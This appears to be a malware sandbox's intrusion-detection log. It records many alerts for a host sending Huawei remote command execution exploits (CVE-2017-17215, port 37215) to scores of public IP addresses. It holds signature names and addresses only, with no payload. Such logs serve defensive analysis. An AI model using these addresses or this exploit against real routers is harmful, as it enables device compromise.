                                                    07/10/24-08:26:49.855316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798637215192.168.2.14197.72.9.136
                                                    07/10/24-08:27:07.276755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827837215192.168.2.14197.252.127.150
                                                    07/10/24-08:27:27.070313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740637215192.168.2.14157.246.178.150
                                                    07/10/24-08:26:38.633686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590437215192.168.2.14197.18.57.161
                                                    07/10/24-08:27:02.823205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142037215192.168.2.1441.95.46.119
                                                    07/10/24-08:27:19.322147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426837215192.168.2.1441.126.66.218
                                                    07/10/24-08:26:23.313392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926237215192.168.2.14197.109.39.149
                                                    07/10/24-08:26:29.849427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147437215192.168.2.14157.38.228.6
                                                    07/10/24-08:26:42.368823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131037215192.168.2.14197.146.105.2
                                                    07/10/24-08:26:15.800332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676237215192.168.2.14157.30.9.250
                                                    07/10/24-08:27:08.339309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5962437215192.168.2.14197.228.211.226
                                                    07/10/24-08:26:57.662129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131037215192.168.2.14197.223.2.184
                                                    07/10/24-08:26:33.250485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710437215192.168.2.14197.194.182.241
                                                    07/10/24-08:26:38.647269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814237215192.168.2.14157.69.135.122
                                                    07/10/24-08:26:57.586021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927237215192.168.2.1441.134.98.229
                                                    07/10/24-08:26:17.953506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765437215192.168.2.14197.146.199.170
                                                    07/10/24-08:27:19.202917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478837215192.168.2.14197.197.247.17
                                                    07/10/24-08:26:36.397688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504837215192.168.2.14197.243.223.175
                                                    07/10/24-08:27:33.758146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466837215192.168.2.14197.113.176.125
                                                    07/10/24-08:26:13.788071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232437215192.168.2.1441.217.110.52
                                                    07/10/24-08:26:42.363938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653637215192.168.2.14197.69.104.28
                                                    07/10/24-08:26:49.777925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064437215192.168.2.14157.30.144.150
                                                    07/10/24-08:26:28.901857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396637215192.168.2.1441.253.11.18
                                                    07/10/24-08:26:55.412388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420437215192.168.2.14157.53.200.85
                                                    07/10/24-08:27:19.334361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641037215192.168.2.1441.62.198.136
                                                    07/10/24-08:26:57.580617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355637215192.168.2.14184.208.243.255
                                                    07/10/24-08:27:33.840448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510237215192.168.2.14197.231.224.209
                                                    07/10/24-08:26:17.996521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868437215192.168.2.1478.74.71.171
                                                    07/10/24-08:26:28.642982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181837215192.168.2.1441.211.67.110
                                                    07/10/24-08:27:30.436856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701237215192.168.2.1441.242.176.95
                                                    07/10/24-08:26:55.366758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512037215192.168.2.14157.107.226.4
                                                    07/10/24-08:26:51.979594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099437215192.168.2.1441.147.164.26
                                                    07/10/24-08:26:59.654831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006837215192.168.2.14157.57.220.220
                                                    07/10/24-08:26:14.735455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821837215192.168.2.14157.73.160.11
                                                    07/10/24-08:27:02.989706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407437215192.168.2.1441.13.23.182
                                                    07/10/24-08:26:14.811760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960837215192.168.2.14197.214.243.205
                                                    07/10/24-08:26:59.817840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374037215192.168.2.14157.40.143.37
                                                    07/10/24-08:27:22.783603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190637215192.168.2.14197.180.101.25
                                                    07/10/24-08:26:43.788473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596837215192.168.2.14162.141.128.235
                                                    07/10/24-08:27:19.340130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091837215192.168.2.14157.12.250.17
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162037215192.168.2.14197.45.160.10
                                                    07/10/24-08:27:17.027342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753837215192.168.2.14157.225.30.226
                                                    07/10/24-08:26:49.784403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863037215192.168.2.1441.252.22.171
                                                    07/10/24-08:26:17.951496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526437215192.168.2.14157.52.104.164
                                                    07/10/24-08:26:36.440849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226637215192.168.2.14197.142.245.197
                                                    07/10/24-08:27:19.191289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930237215192.168.2.1441.221.136.234
                                                    07/10/24-08:26:17.945424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512237215192.168.2.14157.90.215.205
                                                    07/10/24-08:26:41.354295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028237215192.168.2.14157.10.226.35
                                                    07/10/24-08:26:59.569562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887837215192.168.2.14197.16.155.129
                                                    07/10/24-08:26:42.375701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453437215192.168.2.1451.153.153.116
                                                    07/10/24-08:27:27.131839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359637215192.168.2.149.100.123.151
                                                    07/10/24-08:26:52.012219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723237215192.168.2.1441.77.154.31
                                                    07/10/24-08:27:11.546125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666637215192.168.2.14157.222.90.72
                                                    07/10/24-08:26:20.085617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848837215192.168.2.14191.42.235.44
                                                    07/10/24-08:26:20.182553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5076637215192.168.2.1462.94.12.221
                                                    07/10/24-08:26:11.545606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501037215192.168.2.14157.182.7.2
                                                    07/10/24-08:27:22.748001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494237215192.168.2.14197.85.44.196
                                                    07/10/24-08:26:29.794117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042037215192.168.2.14197.227.190.140
                                                    07/10/24-08:26:31.084191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258837215192.168.2.14157.86.1.107
                                                    07/10/24-08:26:42.426350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735037215192.168.2.14157.132.70.39
                                                    07/10/24-08:27:31.559340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900437215192.168.2.14197.169.148.206
                                                    07/10/24-08:26:29.766220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349037215192.168.2.14115.249.154.233
                                                    07/10/24-08:26:31.069487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039037215192.168.2.14197.17.204.210
                                                    07/10/24-08:26:47.948537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553637215192.168.2.1441.94.117.125
                                                    07/10/24-08:27:22.802348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771037215192.168.2.14157.169.122.238
                                                    07/10/24-08:26:42.404259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476037215192.168.2.14197.117.169.43
                                                    07/10/24-08:26:42.409730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619837215192.168.2.14117.139.96.66
                                                    07/10/24-08:27:05.126538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625237215192.168.2.149.67.121.188
                                                    07/10/24-08:26:23.296739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459237215192.168.2.1441.220.34.225
                                                    07/10/24-08:26:55.367702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669237215192.168.2.14122.119.133.146
                                                    07/10/24-08:27:24.993711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133037215192.168.2.14153.214.202.252
                                                    07/10/24-08:26:52.070020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593037215192.168.2.1441.3.144.152
                                                    07/10/24-08:26:28.808876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775437215192.168.2.14157.160.40.196
                                                    07/10/24-08:26:41.404911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694437215192.168.2.1441.206.124.240
                                                    07/10/24-08:27:10.617808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261237215192.168.2.1441.145.219.253
                                                    07/10/24-08:27:13.835787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392037215192.168.2.14154.48.100.111
                                                    07/10/24-08:26:14.657755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360837215192.168.2.14197.70.151.58
                                                    07/10/24-08:27:32.587332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613037215192.168.2.14217.75.75.47
                                                    07/10/24-08:27:30.511682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287237215192.168.2.14157.209.160.198
                                                    07/10/24-08:26:29.868955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659237215192.168.2.1479.53.96.197
                                                    07/10/24-08:26:42.361617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984637215192.168.2.1498.79.42.175
                                                    07/10/24-08:26:49.850247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949637215192.168.2.14157.31.192.167
                                                    07/10/24-08:27:30.518988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914037215192.168.2.14219.247.255.149
                                                    07/10/24-08:26:47.868909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110037215192.168.2.14157.147.183.62
                                                    07/10/24-08:26:29.784523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714237215192.168.2.14197.148.123.50
                                                    07/10/24-08:27:20.506153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630237215192.168.2.1441.187.30.214
                                                    07/10/24-08:26:47.866272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021237215192.168.2.14157.213.24.175
                                                    07/10/24-08:26:41.391296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215637215192.168.2.14197.85.174.67
                                                    07/10/24-08:26:28.773956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.14197.6.18.169
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782237215192.168.2.14197.105.204.159
                                                    07/10/24-08:27:02.733003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486637215192.168.2.14223.95.115.184
                                                    07/10/24-08:26:42.381146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760637215192.168.2.14158.241.168.5
                                                    07/10/24-08:26:59.542620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359437215192.168.2.1441.45.189.249
                                                    07/10/24-08:27:08.426882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513837215192.168.2.14197.138.129.237
                                                    07/10/24-08:27:05.112679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673437215192.168.2.144.249.170.250
                                                    07/10/24-08:27:20.478672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090637215192.168.2.14157.72.231.165
                                                    07/10/24-08:27:34.127270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869837215192.168.2.14157.169.249.25
                                                    07/10/24-08:27:17.088792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482037215192.168.2.14197.224.162.43
                                                    07/10/24-08:27:33.857818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773637215192.168.2.14197.209.98.246
                                                    07/10/24-08:26:53.210385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604237215192.168.2.14157.246.67.155
                                                    07/10/24-08:27:05.230856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750437215192.168.2.14205.131.44.193
                                                    07/10/24-08:26:43.796387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669037215192.168.2.1441.22.26.248
                                                    07/10/24-08:27:33.862601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868037215192.168.2.14197.191.97.96
                                                    07/10/24-08:27:08.373908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539837215192.168.2.14197.164.33.110
                                                    07/10/24-08:26:23.297674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720237215192.168.2.1443.18.10.33
                                                    07/10/24-08:26:52.057809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356237215192.168.2.1441.84.202.75
                                                    07/10/24-08:26:20.172014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632437215192.168.2.1458.26.244.147
                                                    07/10/24-08:26:34.251063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3916837215192.168.2.1441.163.218.228
                                                    07/10/24-08:27:10.666062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663037215192.168.2.14179.253.169.83
                                                    07/10/24-08:26:26.437789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037437215192.168.2.14157.214.222.223
                                                    07/10/24-08:26:28.650487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896637215192.168.2.1481.34.42.42
                                                    07/10/24-08:26:41.365673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004037215192.168.2.14112.93.70.213
                                                    07/10/24-08:26:17.944917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915837215192.168.2.14197.60.94.70
                                                    07/10/24-08:26:11.600556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814237215192.168.2.14157.124.43.107
                                                    07/10/24-08:26:25.523896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315237215192.168.2.14157.127.210.225
                                                    07/10/24-08:26:28.921893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624237215192.168.2.1431.210.200.143
                                                    07/10/24-08:27:08.448345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141837215192.168.2.1478.150.68.3
                                                    07/10/24-08:26:29.871323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015437215192.168.2.14104.57.46.88
                                                    07/10/24-08:26:43.601357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694237215192.168.2.1441.55.123.193
                                                    07/10/24-08:26:34.179823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917037215192.168.2.1441.234.195.173
                                                    07/10/24-08:27:02.853757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470437215192.168.2.14122.41.169.54
                                                    07/10/24-08:26:43.607360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848437215192.168.2.1441.232.65.189
                                                    07/10/24-08:26:42.176509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589037215192.168.2.14106.81.72.235
                                                    07/10/24-08:27:30.527827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748037215192.168.2.14157.10.68.80
                                                    07/10/24-08:27:02.733003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937237215192.168.2.1441.25.184.105
                                                    07/10/24-08:26:26.524985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900237215192.168.2.1441.250.155.139
                                                    07/10/24-08:27:30.443855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687437215192.168.2.1448.141.147.44
                                                    07/10/24-08:26:15.873682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283437215192.168.2.1467.19.154.174
                                                    07/10/24-08:26:47.819008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435237215192.168.2.14157.49.171.6
                                                    07/10/24-08:27:31.561854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518237215192.168.2.14157.84.81.11
                                                    07/10/24-08:27:05.116330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875037215192.168.2.1441.255.240.53
                                                    07/10/24-08:27:02.986988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587437215192.168.2.14188.83.196.154
                                                    07/10/24-08:26:41.352222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852637215192.168.2.14197.122.174.153
                                                    07/10/24-08:27:05.129654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752637215192.168.2.14157.250.91.178
                                                    07/10/24-08:26:23.322732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339237215192.168.2.1441.151.210.230
                                                    07/10/24-08:26:36.399838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187637215192.168.2.1499.72.208.235
                                                    07/10/24-08:27:22.896648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667637215192.168.2.14115.109.149.164
                                                    07/10/24-08:26:11.190243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240437215192.168.2.14157.135.80.174
                                                    07/10/24-08:26:42.353894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728237215192.168.2.14197.209.116.209
                                                    07/10/24-08:27:10.595004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503837215192.168.2.14197.121.221.42
                                                    07/10/24-08:26:25.461446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396237215192.168.2.14197.92.0.161
                                                    07/10/24-08:27:02.998271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070037215192.168.2.1441.94.243.119
                                                    07/10/24-08:27:14.846154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452637215192.168.2.14197.213.138.238
                                                    07/10/24-08:27:30.541927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433037215192.168.2.14157.75.49.160
                                                    07/10/24-08:27:13.961699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559037215192.168.2.14197.84.232.23
                                                    07/10/24-08:27:23.494630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947837215192.168.2.14197.170.254.10
                                                    07/10/24-08:27:28.096312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845237215192.168.2.1441.139.237.216
                                                    07/10/24-08:27:02.702114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593637215192.168.2.1467.9.245.175
                                                    07/10/24-08:27:13.721349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429637215192.168.2.14197.232.180.95
                                                    07/10/24-08:27:34.133115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629837215192.168.2.14197.95.161.105
                                                    07/10/24-08:26:26.591282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620237215192.168.2.14157.34.79.253
                                                    07/10/24-08:26:55.429801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500437215192.168.2.14197.68.42.30
                                                    07/10/24-08:27:31.571103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121837215192.168.2.14197.7.234.147
                                                    07/10/24-08:26:51.949287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299237215192.168.2.1441.156.140.180
                                                    07/10/24-08:26:22.210763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762437215192.168.2.14197.83.5.189
                                                    07/10/24-08:26:14.828942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037437215192.168.2.14197.45.123.204
                                                    07/10/24-08:26:57.523580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463637215192.168.2.14197.34.235.143
                                                    07/10/24-08:27:17.093189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974037215192.168.2.1481.127.135.160
                                                    07/10/24-08:27:24.903718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542837215192.168.2.14157.68.14.253
                                                    07/10/24-08:27:19.327774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.14157.51.84.145
                                                    07/10/24-08:26:49.858364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706237215192.168.2.14157.209.242.210
                                                    07/10/24-08:27:13.999285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073037215192.168.2.1441.207.53.225
                                                    07/10/24-08:26:41.559243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605837215192.168.2.1441.146.50.21
                                                    07/10/24-08:27:32.606203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591837215192.168.2.1423.150.14.30
                                                    07/10/24-08:26:34.202394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780837215192.168.2.14157.65.55.202
                                                    07/10/24-08:26:55.437188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624637215192.168.2.1441.188.212.186
                                                    07/10/24-08:27:24.928816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824437215192.168.2.1464.83.74.35
                                                    07/10/24-08:27:24.938068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435237215192.168.2.14157.169.181.226
                                                    07/10/24-08:27:33.894424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826437215192.168.2.14197.82.243.52
                                                    07/10/24-08:26:11.664680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640837215192.168.2.14157.107.27.74
                                                    07/10/24-08:27:08.389316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082837215192.168.2.14114.189.16.61
                                                    07/10/24-08:26:36.341806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525637215192.168.2.14157.22.177.49
                                                    07/10/24-08:26:17.974757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953237215192.168.2.1441.24.149.100
                                                    07/10/24-08:26:59.600211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.1441.201.183.211
                                                    07/10/24-08:27:07.259693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501037215192.168.2.1441.230.52.112
                                                    07/10/24-08:27:23.942170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883837215192.168.2.14197.201.224.62
                                                    07/10/24-08:26:17.986594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002437215192.168.2.14157.177.65.150
                                                    07/10/24-08:27:31.538711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378237215192.168.2.14184.220.100.37
                                                    07/10/24-08:27:07.397388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772237215192.168.2.1440.225.112.236
                                                    07/10/24-08:26:34.248893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685237215192.168.2.1441.243.167.68
                                                    07/10/24-08:27:02.749504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921637215192.168.2.14197.185.209.224
                                                    07/10/24-08:27:03.033408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778237215192.168.2.1441.80.54.225
                                                    07/10/24-08:27:32.526946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3563837215192.168.2.1441.20.136.45
                                                    07/10/24-08:26:26.593933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967637215192.168.2.1441.31.66.150
                                                    07/10/24-08:26:34.247589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.1441.68.221.2
